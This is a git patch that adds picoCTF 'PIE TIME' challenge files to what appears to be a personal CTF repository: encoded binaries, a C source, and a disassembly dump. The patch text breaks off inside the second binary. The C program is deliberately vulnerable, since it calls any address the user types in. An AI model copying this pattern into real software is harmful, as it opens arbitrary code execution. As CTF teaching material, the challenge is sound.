From 8de013b32de6b57916a586846a4304aba7e02644 Mon Sep 17 00:00:00 2001 From: Madalina Date: Sun, 11 May 2025 11:37:38 -0400 Subject: [PATCH 1/9] Add files for PIE time 1 and 2 --- .../binary_exploit/pie_time12/pie_time1/vuln | Bin 0 -> 17264 bytes .../pie_time12/pie_time1/vuln.c | 49 +++ .../pie_time12/pie_time1/vuln_dump.txt | 325 +++++++++++++++++ .../binary_exploit/pie_time12/pie_time2/vuln | Bin 0 -> 17384 bytes .../pie_time12/pie_time2/vuln.c | 56 +++ .../pie_time12/pie_time2/vuln_dump.txt | 345 ++++++++++++++++++ picoctf/binary_exploit/pie_time12/writeup.md | 1 + 7 files changed, 776 insertions(+) create mode 100755 picoctf/binary_exploit/pie_time12/pie_time1/vuln create mode 100644 picoctf/binary_exploit/pie_time12/pie_time1/vuln.c create mode 100644 picoctf/binary_exploit/pie_time12/pie_time1/vuln_dump.txt create mode 100755 picoctf/binary_exploit/pie_time12/pie_time2/vuln create mode 100644 picoctf/binary_exploit/pie_time12/pie_time2/vuln.c create mode 100644 picoctf/binary_exploit/pie_time12/pie_time2/vuln_dump.txt create mode 100644 picoctf/binary_exploit/pie_time12/writeup.md diff --git a/picoctf/binary_exploit/pie_time12/pie_time1/vuln b/picoctf/binary_exploit/pie_time12/pie_time1/vuln new file mode 100755 index 0000000000000000000000000000000000000000..986868dd8614e82fde17fda8fc381a16b0c83761 GIT binary patch literal 17264 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 i?uMmtAI60|B;Dbh$~C08)+ucN+ +#include +#include +#include + +void segfault_handler() { + printf("Segfault Occurred, incorrect address.\n"); + exit(0); +} + +int win() { + FILE *fptr; + char c; + + printf("You won!\n"); + // Open file + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file.\n"); + exit(0); + } + + // Read contents from file + c = fgetc(fptr); + while (c != EOF) + { + printf ("%c", c); + c = fgetc(fptr); + } + + printf("\n"); + fclose(fptr); +} + +int main() { + signal(SIGSEGV, segfault_handler); + setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered + + printf("Address of main: %p\n", &main); + + unsigned long val; + printf("Enter the address to jump to, ex => 0x12345: "); + scanf("%lx", &val); + printf("Your input: %lx\n", val); + + void (*foo)(void) = (void (*)())val; + foo(); +} \ No newline at end of file diff --git a/picoctf/binary_exploit/pie_time12/pie_time1/vuln_dump.txt b/picoctf/binary_exploit/pie_time12/pie_time1/vuln_dump.txt new file mode 100644 index 0000000..57e5f2c --- /dev/null +++ b/picoctf/binary_exploit/pie_time12/pie_time1/vuln_dump.txt @@ -0,0 +1,325 @@ + +vuln: file format elf64-x86-64 + +Disassembly of section .init: + +0000000000001000 <_init>: + 1000: f3 0f 1e fa endbr64 + 1004: 48 83 ec 08 subq $8, %rsp + 1008: 48 8b 05 d9 2f 00 00 movq 12249(%rip), %rax # 0x3fe8 <_GLOBAL_OFFSET_TABLE_+0x80> + 100f: 48 85 c0 testq %rax, %rax + 1012: 74 02 je 0x1016 <_init+0x16> + 1014: ff d0 callq *%rax + 1016: 48 83 c4 08 addq $8, %rsp + 101a: c3 retq + +Disassembly of section .plt: + +0000000000001020 <.plt>: + 1020: ff 35 4a 2f 00 00 pushq 12106(%rip) # 0x3f70 <_GLOBAL_OFFSET_TABLE_+0x8> + 1026: f2 ff 25 4b 2f 00 00 repne jmpq *12107(%rip) # 0x3f78 <_GLOBAL_OFFSET_TABLE_+0x10> + 102d: 0f 1f 00 nopl (%rax) + 1030: f3 0f 1e fa endbr64 + 1034: 68 00 00 00 00 pushq $0 + 1039: f2 e9 e1 ff ff ff repne jmp 0x1020 <.plt> + 103f: 90 nop + 1040: f3 0f 1e fa endbr64 + 1044: 68 01 00 00 00 pushq $1 + 1049: f2 e9 d1 ff ff ff repne jmp 0x1020 <.plt> + 104f: 90 nop + 1050: f3 0f 1e fa endbr64 + 1054: 68 02 00 00 00 pushq $2 + 1059: f2 e9 c1 ff ff ff repne jmp 0x1020 <.plt> + 105f: 90 nop + 1060: f3 0f 1e fa endbr64 + 1064: 68 03 00 00 00 pushq $3 + 1069: f2 e9 b1 ff ff ff repne jmp 0x1020 <.plt> + 106f: 90 nop + 1070: f3 0f 1e fa endbr64 + 1074: 68 04 00 00 00 pushq $4 + 1079: f2 e9 a1 ff ff ff repne jmp 0x1020 <.plt> + 107f: 90 nop + 1080: f3 0f 1e fa endbr64 + 1084: 68 05 00 00 00 pushq $5 + 1089: f2 e9 91 ff ff ff repne jmp 0x1020 <.plt> + 108f: 90 nop + 1090: f3 0f 1e fa endbr64 + 1094: 68 06 00 00 00 pushq $6 + 1099: f2 e9 81 ff ff ff repne jmp 0x1020 <.plt> + 109f: 90 nop + 10a0: f3 0f 1e fa endbr64 + 10a4: 68 07 00 00 00 pushq $7 + 10a9: f2 e9 71 ff ff ff repne jmp 0x1020 <.plt> + 10af: 90 nop + 10b0: f3 0f 1e fa endbr64 + 10b4: 68 08 00 00 00 pushq $8 + 10b9: f2 e9 61 ff ff ff repne jmp 0x1020 <.plt> + 10bf: 90 nop + 10c0: f3 0f 1e fa endbr64 + 10c4: 68 09 00 00 00 pushq $9 + 10c9: f2 e9 51 ff ff ff repne jmp 0x1020 <.plt> + 10cf: 90 nop + 10d0: f3 0f 1e fa endbr64 + 10d4: 68 0a 00 00 00 pushq $10 + 10d9: f2 e9 41 ff ff ff repne jmp 0x1020 <.plt> + 10df: 90 nop + +Disassembly of section .plt.got: + +00000000000010e0 <.plt.got>: + 10e0: f3 0f 1e fa endbr64 + 10e4: f2 ff 25 0d 2f 00 00 repne jmpq *12045(%rip) # 0x3ff8 <_GLOBAL_OFFSET_TABLE_+0x90> + 10eb: 0f 1f 44 00 00 nopl (%rax,%rax) + +Disassembly of section .plt.sec: + +00000000000010f0 <.plt.sec>: + 10f0: f3 0f 1e fa endbr64 + 10f4: f2 ff 25 85 2e 00 00 repne jmpq *11909(%rip) # 0x3f80 <_GLOBAL_OFFSET_TABLE_+0x18> + 10fb: 0f 1f 44 00 00 nopl (%rax,%rax) + 1100: f3 0f 1e fa endbr64 + 1104: f2 ff 25 7d 2e 00 00 repne jmpq *11901(%rip) # 0x3f88 <_GLOBAL_OFFSET_TABLE_+0x20> + 110b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1110: f3 0f 1e fa endbr64 + 1114: f2 ff 25 75 2e 00 00 repne jmpq *11893(%rip) # 0x3f90 <_GLOBAL_OFFSET_TABLE_+0x28> + 111b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1120: f3 0f 1e fa endbr64 + 1124: f2 ff 25 6d 2e 00 00 repne jmpq *11885(%rip) # 0x3f98 <_GLOBAL_OFFSET_TABLE_+0x30> + 112b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1130: f3 0f 1e fa endbr64 + 1134: f2 ff 25 65 2e 00 00 repne jmpq *11877(%rip) # 0x3fa0 <_GLOBAL_OFFSET_TABLE_+0x38> + 113b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1140: f3 0f 1e fa endbr64 + 1144: f2 ff 25 5d 2e 00 00 repne jmpq *11869(%rip) # 0x3fa8 <_GLOBAL_OFFSET_TABLE_+0x40> + 114b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1150: f3 0f 1e fa endbr64 + 1154: f2 ff 25 55 2e 00 00 repne jmpq *11861(%rip) # 0x3fb0 <_GLOBAL_OFFSET_TABLE_+0x48> + 115b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1160: f3 0f 1e fa endbr64 + 1164: f2 ff 25 4d 2e 00 00 repne jmpq *11853(%rip) # 0x3fb8 <_GLOBAL_OFFSET_TABLE_+0x50> + 116b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1170: f3 0f 1e fa endbr64 + 1174: f2 ff 25 45 2e 00 00 repne jmpq *11845(%rip) # 0x3fc0 <_GLOBAL_OFFSET_TABLE_+0x58> + 117b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1180: f3 0f 1e fa endbr64 + 1184: f2 ff 25 3d 2e 00 00 repne jmpq *11837(%rip) # 0x3fc8 <_GLOBAL_OFFSET_TABLE_+0x60> + 118b: 0f 1f 44 00 00 nopl (%rax,%rax) + 1190: f3 0f 1e fa endbr64 + 1194: f2 ff 25 35 2e 00 00 repne jmpq *11829(%rip) # 0x3fd0 <_GLOBAL_OFFSET_TABLE_+0x68> + 119b: 0f 1f 44 00 00 nopl (%rax,%rax) + +Disassembly of section .text: + +00000000000011a0 <_start>: + 11a0: f3 0f 1e fa endbr64 + 11a4: 31 ed xorl %ebp, %ebp + 11a6: 49 89 d1 movq %rdx, %r9 + 11a9: 5e popq %rsi + 11aa: 48 89 e2 movq %rsp, %rdx + 11ad: 48 83 e4 f0 andq $-16, %rsp + 11b1: 50 pushq %rax + 11b2: 54 pushq %rsp + 11b3: 4c 8d 05 c6 02 00 00 leaq 710(%rip), %r8 # 0x1480 <__libc_csu_fini> + 11ba: 48 8d 0d 4f 02 00 00 leaq 591(%rip), %rcx # 0x1410 <__libc_csu_init> + 11c1: 48 8d 3d 75 01 00 00 leaq 373(%rip), %rdi # 0x133d
+ 11c8: ff 15 12 2e 00 00 callq *11794(%rip) # 0x3fe0 <_GLOBAL_OFFSET_TABLE_+0x78> + 11ce: f4 hlt + 11cf: 90 nop + +00000000000011d0 : + 11d0: 48 8d 3d 39 2e 00 00 leaq 11833(%rip), %rdi # 0x4010 + 11d7: 48 8d 05 32 2e 00 00 leaq 11826(%rip), %rax # 0x4010 + 11de: 48 39 f8 cmpq %rdi, %rax + 11e1: 74 15 je 0x11f8 + 11e3: 48 8b 05 ee 2d 00 00 movq 11758(%rip), %rax # 0x3fd8 <_GLOBAL_OFFSET_TABLE_+0x70> + 11ea: 48 85 c0 testq %rax, %rax + 11ed: 74 09 je 0x11f8 + 11ef: ff e0 jmpq *%rax + 11f1: 0f 1f 80 00 00 00 00 nopl (%rax) + 11f8: c3 retq + 11f9: 0f 1f 80 00 00 00 00 nopl (%rax) + +0000000000001200 : + 1200: 48 8d 3d 09 2e 00 00 leaq 11785(%rip), %rdi # 0x4010 + 1207: 48 8d 35 02 2e 00 00 leaq 11778(%rip), %rsi # 0x4010 + 120e: 48 29 fe subq %rdi, %rsi + 1211: 48 89 f0 movq %rsi, %rax + 1214: 48 c1 ee 3f shrq $63, %rsi + 1218: 48 c1 f8 03 sarq $3, %rax + 121c: 48 01 c6 addq %rax, %rsi + 121f: 48 d1 fe sarq %rsi + 1222: 74 14 je 0x1238 + 1224: 48 8b 05 c5 2d 00 00 movq 11717(%rip), %rax # 0x3ff0 <_GLOBAL_OFFSET_TABLE_+0x88> + 122b: 48 85 c0 testq %rax, %rax + 122e: 74 08 je 0x1238 + 1230: ff e0 jmpq *%rax + 1232: 66 0f 1f 44 00 00 nopw (%rax,%rax) + 1238: c3 retq + 1239: 0f 1f 80 00 00 00 00 nopl (%rax) + +0000000000001240 <__do_global_dtors_aux>: + 1240: f3 0f 1e fa endbr64 + 1244: 80 3d cd 2d 00 00 00 cmpb $0, 11725(%rip) # 0x4018 + 124b: 75 2b jne 0x1278 <__do_global_dtors_aux+0x38> + 124d: 55 pushq %rbp + 124e: 48 83 3d a2 2d 00 00 00 cmpq $0, 11682(%rip) # 0x3ff8 <_GLOBAL_OFFSET_TABLE_+0x90> + 1256: 48 89 e5 movq %rsp, %rbp + 1259: 74 0c je 0x1267 <__do_global_dtors_aux+0x27> + 125b: 48 8b 3d a6 2d 00 00 movq 11686(%rip), %rdi # 0x4008 <__dso_handle> + 1262: e8 79 fe ff ff callq 0x10e0 <.plt.got> + 1267: e8 64 ff ff ff callq 0x11d0 + 126c: c6 05 a5 2d 00 00 01 movb $1, 11685(%rip) # 0x4018 + 1273: 5d popq %rbp + 1274: c3 retq + 1275: 0f 1f 00 nopl (%rax) + 1278: c3 retq + 1279: 0f 1f 80 00 00 00 00 nopl (%rax) + +0000000000001280 : + 1280: f3 0f 1e fa endbr64 + 1284: e9 77 ff ff ff jmp 0x1200 + +0000000000001289 : + 1289: f3 0f 1e fa endbr64 + 128d: 55 pushq %rbp + 128e: 48 89 e5 movq %rsp, %rbp + 1291: 48 8d 3d 70 0d 00 00 leaq 3440(%rip), %rdi # 0x2008 <_IO_stdin_used+0x8> + 1298: e8 63 fe ff ff callq 0x1100 <.plt.sec+0x10> + 129d: bf 00 00 00 00 movl $0, %edi + 12a2: e8 e9 fe ff ff callq 0x1190 <.plt.sec+0xa0> + +00000000000012a7 : + 12a7: f3 0f 1e fa endbr64 + 12ab: 55 pushq %rbp + 12ac: 48 89 e5 movq %rsp, %rbp + 12af: 48 83 ec 10 subq $16, %rsp + 12b3: 48 8d 3d 74 0d 00 00 leaq 3444(%rip), %rdi # 0x202e <_IO_stdin_used+0x2e> + 12ba: e8 41 fe ff ff callq 0x1100 <.plt.sec+0x10> + 12bf: 48 8d 35 71 0d 00 00 leaq 3441(%rip), %rsi # 0x2037 <_IO_stdin_used+0x37> + 12c6: 48 8d 3d 6c 0d 00 00 leaq 3436(%rip), %rdi # 0x2039 <_IO_stdin_used+0x39> + 12cd: e8 9e fe ff ff callq 0x1170 <.plt.sec+0x80> + 12d2: 48 89 45 f8 movq %rax, -8(%rbp) + 12d6: 48 83 7d f8 00 cmpq $0, -8(%rbp) + 12db: 75 16 jne 0x12f3 + 12dd: 48 8d 3d 5e 0d 00 00 leaq 3422(%rip), %rdi # 0x2042 <_IO_stdin_used+0x42> + 12e4: e8 17 fe ff ff callq 0x1100 <.plt.sec+0x10> + 12e9: bf 00 00 00 00 movl $0, %edi + 12ee: e8 9d fe ff ff callq 0x1190 <.plt.sec+0xa0> + 12f3: 48 8b 45 f8 movq -8(%rbp), %rax + 12f7: 48 89 c7 movq %rax, %rdi + 12fa: e8 41 fe ff ff callq 0x1140 <.plt.sec+0x50> + 12ff: 88 45 f7 movb %al, -9(%rbp) + 1302: eb 1a jmp 0x131e + 1304: 0f be 45 f7 movsbl -9(%rbp), %eax + 1308: 89 c7 movl %eax, %edi + 130a: e8 e1 fd ff ff callq 0x10f0 <.plt.sec> + 130f: 48 8b 45 f8 movq -8(%rbp), %rax + 1313: 48 89 c7 movq %rax, %rdi + 1316: e8 25 fe ff ff callq 0x1140 <.plt.sec+0x50> + 131b: 88 45 f7 movb %al, -9(%rbp) + 131e: 80 7d f7 ff cmpb $-1, -9(%rbp) + 1322: 75 e0 jne 0x1304 + 1324: bf 0a 00 00 00 movl $10, %edi + 1329: e8 c2 fd ff ff callq 0x10f0 <.plt.sec> + 132e: 48 8b 45 f8 movq -8(%rbp), %rax + 1332: 48 89 c7 movq %rax, %rdi + 1335: e8 d6 fd ff ff callq 0x1110 <.plt.sec+0x20> + 133a: 90 nop + 133b: c9 leave + 133c: c3 retq + +000000000000133d
: + 133d: f3 0f 1e fa endbr64 + 1341: 55 pushq %rbp + 1342: 48 89 e5 movq %rsp, %rbp + 1345: 48 83 ec 20 subq $32, %rsp + 1349: 64 48 8b 04 25 28 00 00 00 movq %fs:40, %rax + 1352: 48 89 45 f8 movq %rax, -8(%rbp) + 1356: 31 c0 xorl %eax, %eax + 1358: 48 8d 35 2a ff ff ff leaq -214(%rip), %rsi # 0x1289 + 135f: bf 0b 00 00 00 movl $11, %edi + 1364: e8 e7 fd ff ff callq 0x1150 <.plt.sec+0x60> + 1369: 48 8b 05 a0 2c 00 00 movq 11424(%rip), %rax # 0x4010 + 1370: b9 00 00 00 00 movl $0, %ecx + 1375: ba 02 00 00 00 movl $2, %edx + 137a: be 00 00 00 00 movl $0, %esi + 137f: 48 89 c7 movq %rax, %rdi + 1382: e8 d9 fd ff ff callq 0x1160 <.plt.sec+0x70> + 1387: 48 8d 35 af ff ff ff leaq -81(%rip), %rsi # 0x133d
+ 138e: 48 8d 3d bf 0c 00 00 leaq 3263(%rip), %rdi # 0x2054 <_IO_stdin_used+0x54> + 1395: b8 00 00 00 00 movl $0, %eax + 139a: e8 91 fd ff ff callq 0x1130 <.plt.sec+0x40> + 139f: 48 8d 3d ca 0c 00 00 leaq 3274(%rip), %rdi # 0x2070 <_IO_stdin_used+0x70> + 13a6: b8 00 00 00 00 movl $0, %eax + 13ab: e8 80 fd ff ff callq 0x1130 <.plt.sec+0x40> + 13b0: 48 8d 45 e8 leaq -24(%rbp), %rax + 13b4: 48 89 c6 movq %rax, %rsi + 13b7: 48 8d 3d e0 0c 00 00 leaq 3296(%rip), %rdi # 0x209e <_IO_stdin_used+0x9e> + 13be: b8 00 00 00 00 movl $0, %eax + 13c3: e8 b8 fd ff ff callq 0x1180 <.plt.sec+0x90> + 13c8: 48 8b 45 e8 movq -24(%rbp), %rax + 13cc: 48 89 c6 movq %rax, %rsi + 13cf: 48 8d 3d cc 0c 00 00 leaq 3276(%rip), %rdi # 0x20a2 <_IO_stdin_used+0xa2> + 13d6: b8 00 00 00 00 movl $0, %eax + 13db: e8 50 fd ff ff callq 0x1130 <.plt.sec+0x40> + 13e0: 48 8b 45 e8 movq -24(%rbp), %rax + 13e4: 48 89 45 f0 movq %rax, -16(%rbp) + 13e8: 48 8b 45 f0 movq -16(%rbp), %rax + 13ec: ff d0 callq *%rax + 13ee: b8 00 00 00 00 movl $0, %eax + 13f3: 48 8b 55 f8 movq -8(%rbp), %rdx + 13f7: 64 48 33 14 25 28 00 00 00 xorq %fs:40, %rdx + 1400: 74 05 je 0x1407 + 1402: e8 19 fd ff ff callq 0x1120 <.plt.sec+0x30> + 1407: c9 leave + 1408: c3 retq + 1409: 0f 1f 80 00 00 00 00 nopl (%rax) + +0000000000001410 <__libc_csu_init>: + 1410: f3 0f 1e fa endbr64 + 1414: 41 57 pushq %r15 + 1416: 4c 8d 3d 4b 29 00 00 leaq 10571(%rip), %r15 # 0x3d68 <__init_array_start> + 141d: 41 56 pushq %r14 + 141f: 49 89 d6 movq %rdx, %r14 + 1422: 41 55 pushq %r13 + 1424: 49 89 f5 movq %rsi, %r13 + 1427: 41 54 pushq %r12 + 1429: 41 89 fc movl %edi, %r12d + 142c: 55 pushq %rbp + 142d: 48 8d 2d 3c 29 00 00 leaq 10556(%rip), %rbp # 0x3d70 <__do_global_dtors_aux_fini_array_entry> + 1434: 53 pushq %rbx + 1435: 4c 29 fd subq %r15, %rbp + 1438: 48 83 ec 08 subq $8, %rsp + 143c: e8 bf fb ff ff callq 0x1000 <_init> + 1441: 48 c1 fd 03 sarq $3, %rbp + 1445: 74 1f je 0x1466 <__libc_csu_init+0x56> + 1447: 31 db xorl %ebx, %ebx + 1449: 0f 1f 80 00 00 00 00 nopl (%rax) + 1450: 4c 89 f2 movq %r14, %rdx + 1453: 4c 89 ee movq %r13, %rsi + 1456: 44 89 e7 movl %r12d, %edi + 1459: 41 ff 14 df callq *(%r15,%rbx,8) + 145d: 48 83 c3 01 addq $1, %rbx + 1461: 48 39 dd cmpq %rbx, %rbp + 1464: 75 ea jne 0x1450 <__libc_csu_init+0x40> + 1466: 48 83 c4 08 addq $8, %rsp + 146a: 5b popq %rbx + 146b: 5d popq %rbp + 146c: 41 5c popq %r12 + 146e: 41 5d popq %r13 + 1470: 41 5e popq %r14 + 1472: 41 5f popq %r15 + 1474: c3 retq + 1475: 66 66 2e 0f 1f 84 00 00 00 00 00 nopw %cs:(%rax,%rax) + +0000000000001480 <__libc_csu_fini>: + 1480: f3 0f 1e fa endbr64 + 1484: c3 retq + +Disassembly of section .fini: + +0000000000001488 <_fini>: + 1488: f3 0f 1e fa endbr64 + 148c: 48 83 ec 08 subq $8, %rsp + 1490: 48 83 c4 08 addq $8, %rsp + 1494: c3 retq diff --git a/picoctf/binary_exploit/pie_time12/pie_time2/vuln b/picoctf/binary_exploit/pie_time12/pie_time2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..058a207f75f2989c1b864fc8fdb9902d2e4f4e92 GIT binary patch literal 17384 zcmeHPeQX@X6`%9Pi39QZ0tuLWE+MI$24C#pge27E&h{m1PvqpCD5s_G)r+7yC0zFcUseQ$Q& zdUt&%D%8K)8|&^j@AuxDnSDDuyK_6^hl6cf%3Ll+$<4mVP#T$UFn*z^`GUv*_}NBQ z3E#`vGBz9JS)4QUegi;jqzh$stPs2#5dEq#QvjD3G$W)IBBEchR5RDm5HhbJqhC2@ zh3v%Ni$V!WZ`LQFGbD+Bo7gFikI?FevFWTe>^mFnctZG%3M4-i(XUtd^$I`2No)`# zLW(CgA3qyKJe??k4wJ;c8FTvW5q?f=5%z>w2d3Q@wa90wZ>R8kTH?hpC+;<9Mo9JD z34R!t|1{BQ-X-cQb{>w2_!ElovbFJ8*M^3*@knhvmdy6m_HEoyyP?6CN%_|CCSbd; z4(wA~w|6ioW&}AAMt&|92pRRck+<*t-GRj7M+cr>^N#%U4<_Gvg2xZbz&g-3v@wqV88+bZGUTpB14uPXk1RQ_zLMzf2+?613d?sBQ$3WQDT`?c+(~&6AmS# zEEDTahT^O@t7Sly(L&+-lyJ{|N;DMXY`7zUHp zzDb6h3) z!tDl+*Dkh`(wK#(vQRf};jxcVnzZoNi+sw$Tl+8dGaR3Ate`~w33(bnP}e8QnFD!@ z8>ImYPh%VE9<%T?Mk7CL;js=%M=iW{96x5^v2IGoExfp;bJYn8e-#-6zF^_!S@;nP z4;{cv=PbO(WEmT^@KqMRlr2S|6oFC%N)aeU;D0Fs?^P}PSRQ<fkB(?% z`lvkk%Zk(dF!l9KKY%)8QS-tCO`34UDt=Xj1LU?iSwq64?6jYQ>Kg$4*7|n znle5x6024tbwL?r_N49CFYhH#+3?4!PDLuX4ys9r8k}T>o}! z?)<%S?sa+ajme$uZA0aMgEJrxRi-#JRs-k@^YDwp`@`~3;|<^|50zhouxUzL2&euP z(BY|{tB+MJAAo4F(*nVM0+mDSUq@JdMb1sir!L(tpPF*Zt~2uaE7}4m;CrHg3Vkff z<4XS6KL#3q0cw_A(;*KweigHF?xHqNKHPW+gz?xFT_2CY$vIR04Uk>?z}KuF{U;8B z5;Gm(2MyX;30}Lw>m;^xd;)T&cJQsvh^6_(*b^X_;Elu=72_M2!>iFZJfzZAOd7v&K^$AkB;FLW0;1tVV2lN=y5ulC3 z{TL0P252hxe=PXXKNeNJ9Q+7mpGB93Jm>}<{7BD^oy1FGyvm}!3G&01Rt>Fx3XbF? zUMk~val7)#HH^IoGJ6Rx=$A2vm9~P`2+|?&;5j^HkD#7kPl3DIh8o?g84G-=HTPrY5wJwSCEiNxR=cC2Y+RFegu~f%T8-Q+#ggF^E<&@T=l9i;Tr2W}MFW}9R+9x%BQL5{!Uw2Ex`ppts74Ktrr?S$) zRPsiaX3==4+o$zutT~iSrZfp(W=YXl9H-wf6I|@RZ4V&MT^@Ny*N*_UPwM*ffDypo z0Iqyj*EPV(ysp0ixCRhkV7vk-0Y=`_bwA+qfDyoz@9X-H0P)={Cf5VIn5)n0T0Cz~ z#jxOU&B1XfAAa#*tYr>=-Lew04e*(~r0b)|d%Rmb)pt}~eXwGH-M(n^=WkiL0%

